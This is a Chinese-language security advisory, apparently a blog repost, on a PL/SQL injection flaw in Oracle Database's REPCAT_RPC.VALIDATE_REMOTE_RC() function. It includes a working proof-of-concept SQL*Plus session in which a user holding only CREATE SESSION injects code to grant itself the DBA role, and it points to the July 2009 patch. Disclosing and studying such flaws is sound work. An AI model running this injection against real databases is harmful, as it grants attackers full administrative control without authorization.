Oracle Advanced Replication组件REPCAT_RPC.VALIDATE_REMOTE_RC()函数权限提升漏洞

发表评论 (0) 查看评论

受影响系统:

Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 10.2.0.3
Oracle Database 10.1.0.5

描述:
Oracle Database是一款商业性质大型数据库系统。

Oracle数据库Advanced Replication组件中的REPCAT_RPC.VALIDATE_REMOTE_RC()函数执行了可能受控的匿名PL/SQL。该函数取当前登录用户名为第一个参数,第二个参数VALIDATE_STRING直接放到了PLSQL的匿名块中并执行:



SQL_CURSOR := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(SQL_CURSOR, ‘BEGIN ‘ || ‘ :err :=
sys.dbms_repcat_validate.’ || VALIDATE_STRING || ‘(:canon_gname);’ || ‘
END;’, DBMS_SQL.V7);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, ‘err’, ERR);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, ‘canon_gname’, CANON_GNAME);
DUMMY := DBMS_SQL.EXECUTE(SQL_CURSOR);

这可能允许攻击者以提升的权限执行任意代码。

<*来源:David Litchfield (david@nextgenss.com
  
  链接:http://www.databasesecurity.com/oracle/plsql-injection-create-session.pdf
        http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

SQL> CONNECT TESTUSER/QWERT124
Connected.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
—————————————-
CREATE SESSION
SQL> SET ROLE DBA;
SET ROLE DBA
*
ERROR at line 1:
ORA-01924: role ‘DBA’ not granted or does not exist
SQL> EXEC SYS.GET_OWNER(‘AAAA”||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
(USER,”VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate
””declare pragma autonomous_transaction;
begin execute immediate ””””grant dba to testuser””””;
end;””; end;–”,”CCCC”)||”AAAA’);
PL/SQL procedure successfully completed.
SQL> SET ROLE DBA;
Role set.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
—————————————-
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION


MANAGE ANY FILE GROUP
READ ANY FILE GROUP
CHANGE NOTIFICATION
CREATE EXTERNAL JOB
160 rows selected.
SQL>

建议:

厂商补丁:

Oracle
——
Oracle已经为此发布了一个安全公告(cpujul2009)以及相应补丁:
cpujul2009:Oracle Critical Patch Update Advisory – July 2009
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html

发表评论?

0 条评论。

发表评论